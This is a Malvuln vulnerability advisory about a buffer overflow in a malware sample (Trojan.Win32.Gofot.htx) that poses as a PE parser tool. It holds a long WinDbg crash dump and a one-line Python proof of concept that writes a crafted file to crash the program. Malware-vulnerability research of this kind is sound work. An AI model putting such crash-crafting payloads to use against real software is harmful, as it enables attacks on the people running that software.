Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/ae062bfe4abd59ac1b9be693fbc45f60.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan.Win32.Gofot.htx Vulnerability: Local File Buffer Overflow Description: HackerJLY PE Parser tool V1.0.1.8 doesnt properly check the files it loads which triggers a local buffer overflow. Analyzing the crash we can see an overwrite of the CX (16-bit) part of the ECX register with our 41414141 exploit pattern. Type: PE32 MD5: ae062bfe4abd59ac1b9be693fbc45f60 Vuln ID: MVID-2021-0110 Dropped files: ASLR: True DEP: True Safe SEH: True Disclosure: 02/25/2021 Memory Dump: 0:000> dd cx 00004141 ???????? ???????? ???????? ???????? (1f60.100): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=45d84141 edx=0057e577 esi=00000003 edi=00000003 eip=7710ed3c esp=0057d9c8 ebp=0057db58 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202 ntdll!ZwWaitForMultipleObjects+0xc: 7710ed3c c21400 ret 14h 0:000> .ecxr eax=04970001 ebx=00000000 ecx=45d84141 edx=0057e577 esi=0057e3a0 edi=0057e570 eip=00dca142 esp=0057e34c ebp=0057e34c iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246 *** WARNING: Unable to verify checksum for Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe *** ERROR: Module load completed but symbols could not be loaded for Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xa142: 00dca142 813950450000 cmp dword ptr [ecx],4550h ds:002b:45d84141=???????? 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** WARNING: Unable to verify checksum for SkinH.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for SkinH.dll - FAULTING_IP: Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142 00dca142 813950450000 cmp dword ptr [ecx],4550h EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 00dca142 (Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x0000a142) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 45d84141 Attempt to read from address 45d84141 DEFAULT_BUCKET_ID: INVALID_POINTER_READ PROCESS_NAME: Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe OVERLAPPED_MODULE: Address regions for 'd3d10warp' and 'resourcepolicyclient.dll' overlap ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 45d84141 READ_ADDRESS: 45d84141 FOLLOWUP_IP: Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142 00dca142 813950450000 cmp dword ptr [ecx],4550h MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 00000100 PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ LAST_CONTROL_TRANSFER: from 00dcab0f to 00dca142 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0057e34c 00dcab0f 0057e570 097c119a 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xa142 0057e37c 00dd0af8 046acc58 0057e577 097c1746 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xab0f 0057e5a0 00dd1d78 046acc58 097c1756 00000111 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x10af8 0057e928 00df676d 00f2fe28 0057f7f0 0057e968 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x11d78 0057e938 00df697c 0057f7f0 000003e9 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3676d 0057e968 00ecb1a4 000003e9 00000000 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3697c 0057e98c 00df3e09 000003e9 00000000 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x10b1a4 0057e9dc 00df96fe 00000000 0080072c 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x33e09 0057e9f0 00df4771 000003e9 0080072c 097c184e Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x396fe 0057eaa8 00defe3e 00000111 000003e9 0080072c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x34771 0057eac8 00df32bb 00000111 000003e9 0080072c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fe3e 0057eb3c 00df334a 0057f7f0 00d802be 00000111 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x332bb 0057eb5c 76eee0bb 00d802be 00000111 000003e9 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3334a 0057eb88 76ef8849 00df3314 00d802be 00000111 user32!_InternalCallWinProc+0x2b 0057ebac 76efb145 00000111 000003e9 0080072c user32!InternalCallWinProc+0x20 0057ec7c 76ef833a 00df3314 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be 0057ecc0 76edf38b 00000111 000003e9 0080072c user32!CallWindowProcAorW+0xd4 0057ecd8 1002285c ffff04db 00d802be 00000111 user32!CallWindowProcA+0x1b 0057ed34 76ef8849 1001f2d0 00d802be 00000111 SkinH+0x2285c 0057ed58 76efb145 00000111 000003e9 0080072c user32!InternalCallWinProc+0x20 0057ee28 76ee8503 1001f2d0 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be 0057ee90 76ee8aa0 03027740 00000000 00000111 user32!DispatchClientMessage+0x1b3 0057eed8 77110bcd 0057eef4 00000020 0057f184 user32!__fnDWORD+0x50 0057ef10 73ee2a4c 76efa9fd 00d802be 00000111 ntdll!KiUserCallbackDispatcher+0x4d 0057ef14 76efa9fd 00d802be 00000111 000003e9 win32u!NtUserMessageCall+0xc 0057ef80 76edb95b 03027740 00000000 0080072c user32!SendMessageWorker+0x860 0057efa8 73836934 00d802be 00000111 000003e9 user32!SendMessageW+0x5b 0057efc8 738368f9 007286c0 00000202 00000000 comctl32!Button_NotifyParent+0x39 0057efe0 7384c14b 7384b890 0080072c 00000000 comctl32!Button_ReleaseCapture+0x9b 0057f074 76eee0bb 0080072c 00000202 00000000 comctl32!Button_WndProc+0x8bb 0057f0a0 76ef8849 7384b890 0080072c 00000202 user32!_InternalCallWinProc+0x2b 0057f0c4 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20 0057f194 76ef833a 7384b890 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be 0057f1d8 76edfbab 00000202 00000000 00150024 user32!CallWindowProcAorW+0xd4 0057f1f0 73a676f5 7384b890 0080072c 00000202 user32!CallWindowProcW+0x1b 0057f214 00defcc9 7384b890 0080072c 00000202 apphelp!DWM8AND16BitHook_CallWindowProcW+0x35 0057f234 00defe55 00000202 00000000 00150024 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fcc9 0057f250 00df32bb 00000202 00000000 00150024 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fe55 0057f2c4 00df334a 0057f924 0080072c 00000202 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x332bb 0057f2e4 76eee0bb 0080072c 00000202 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3334a 0057f310 76ef8849 00df3314 0080072c 00000202 user32!_InternalCallWinProc+0x2b 0057f334 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20 0057f404 76ef833a 00df3314 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be 0057f44c 76edf38b 00000202 00000000 00150024 user32!CallWindowProcAorW+0xd4 0057f464 10007514 ffff039b 0080072c 00000202 user32!CallWindowProcA+0x1b 0057f4d8 76ef8849 10011fd0 0080072c 00000202 SkinH+0x7514 0057f4fc 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20 0057f5cc 76ee90dc 10011fd0 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be 0057f638 76edb2ee 006f0588 00000000 00000100 user32!DispatchMessageWorker+0x4ac 0057f66c 00e0a996 00d802be 006f0588 097c0426 user32!IsDialogMessageW+0x17e 0057f6c0 00df5c7c 0057f7f0 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x4a996 0057f6d4 00df0cb5 006f0588 0057f6f4 00dee82c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x35c7c 0057f6e0 00dee82c 006f0588 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x30cb5 0057f6f4 00df96b9 006f0588 00d802be 0057f718 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2e82c 0057f704 00df289a 006f0588 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x396b9 0057f718 00df7765 00d802be 006f0588 006f0558 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3289a 0057f730 00df78bf 006f0588 0057f748 00df77b0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x37765 0057f73c 00df77b0 006f0588 0057f780 00df790c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x378bf 0057f748 00df790c 006f0588 00000000 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x377b0 0057f780 00deeed5 00000004 097c052a 00f61b48 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3790c 0057f7cc 00dcf1f9 097c053e 00f61b48 00f61b48 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2eed5 0057fb44 00e20c1d 00fc7b10 00000000 00353000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xf1f9 0057fb58 00dd59c4 00dc0000 00000000 006e1eb8 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x60c1d 0057fbe8 76198654 00353000 76198630 1507c2ff Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x159c4 0057fbfc 77104a77 00353000 1fe72005 00000000 kernel32!BaseThreadInitThunk+0x24 0057fc44 77104a47 ffffffff 77129ece 00000000 ntdll!__RtlUserThreadStart+0x2f 0057fc54 00000000 00fc7b10 00353000 00000000 ntdll!_RtlUserThreadStart+0x1b SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142 FOLLOWUP_NAME: MachineOwner MODULE_NAME: Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60 IMAGE_NAME: Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe DEBUG_FLR_IMAGE_TIMESTAMP: 59b2a1cb STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe!Unknown BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142 Exploit/PoC: python -c "print( 'MZ'+'A'*20000)" > pbarbar.exe Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).